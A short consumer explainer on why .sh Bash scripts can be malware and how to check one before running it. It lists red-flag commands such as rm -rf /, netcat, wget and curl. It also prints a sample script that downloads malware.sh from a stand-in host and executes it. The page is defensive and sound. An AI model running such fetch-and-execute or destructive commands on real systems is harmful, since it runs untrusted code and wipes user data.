Is a .sh File Dangerous?

TL;DR

Yes, a .sh file (Bash script) can absolutely be malware. It’s code that your computer will run, and if it’s written maliciously, it can do serious harm. Treat them with the same caution as any other executable file.

What is a .sh File?

A .sh file is a Bash script – a plain text file containing commands that are interpreted by the Bash shell (a common command interpreter on Linux and macOS). They’re used for automating tasks, but can also be used to run harmful code.

Why .sh Files Can Be Dangerous

Because they’re executable, a .sh file can:

• Delete files: A script could wipe important data.
• Install malware: It could download and run other malicious software.
• Steal information: Scripts can be written to send your passwords, browsing history, or other sensitive data to attackers.
• Take control of your system: In severe cases, a script could give an attacker remote access to your computer.

How to Check if a .sh File is Safe

1. Source: The most important thing! Where did the file come from? Only run scripts from sources you completely trust. If it’s emailed to you, or on a website you don’t know well, be very careful.
2. Examine the Code: Open the .sh file in a text editor (like Notepad on Windows, TextEdit on macOS, or nano/vim on Linux). Read the code! Look for anything suspicious.
   • Obfuscated code: If the script is deliberately hard to read (lots of strange characters or encoding), that’s a red flag.
   • Downloads: Commands like wget or curl download files from the internet – be wary if you don’t know what they are downloading.
   • Network connections: Commands like nc (netcat) can establish network connections, potentially sending data to an attacker.
   • Commands that modify system files: Look for commands like rm -rf / (extremely dangerous!), or anything modifying files in critical directories like /etc.
3. Permissions Check (Linux/macOS): Use the ls -l command to check file permissions.

   ls -l suspicious_script.sh

   Look at the first ten characters. If it starts with -rwxr-xr-x, that means anyone can execute the script. If you don’t need to run it, change permissions:

   chmod -x suspicious_script.sh

4. Run in a Sandbox: If you’re unsure, run the script in a virtual machine or sandbox environment (like Docker) to isolate it from your main system. This prevents it from causing harm if it is malicious.
5. Virus Scanning: While not always effective against sophisticated scripts, running a virus scan on the .sh file can sometimes detect known malware.

Example of Suspicious Code

This script downloads and executes a file from an unknown source:

#!/bin/bash
wget http://example.com/malware.sh -O /tmp/malware.sh
bash /tmp/malware.sh

Do not run this script! It’s a clear example of potentially malicious behaviour.

What to Do If You Think You’ve Run Malware

• Disconnect from the internet: Prevent further communication with attackers.
• Run a full system scan: Use reputable antivirus software.
• Reinstall your operating system: In severe cases, this may be the safest option to ensure complete removal of malware.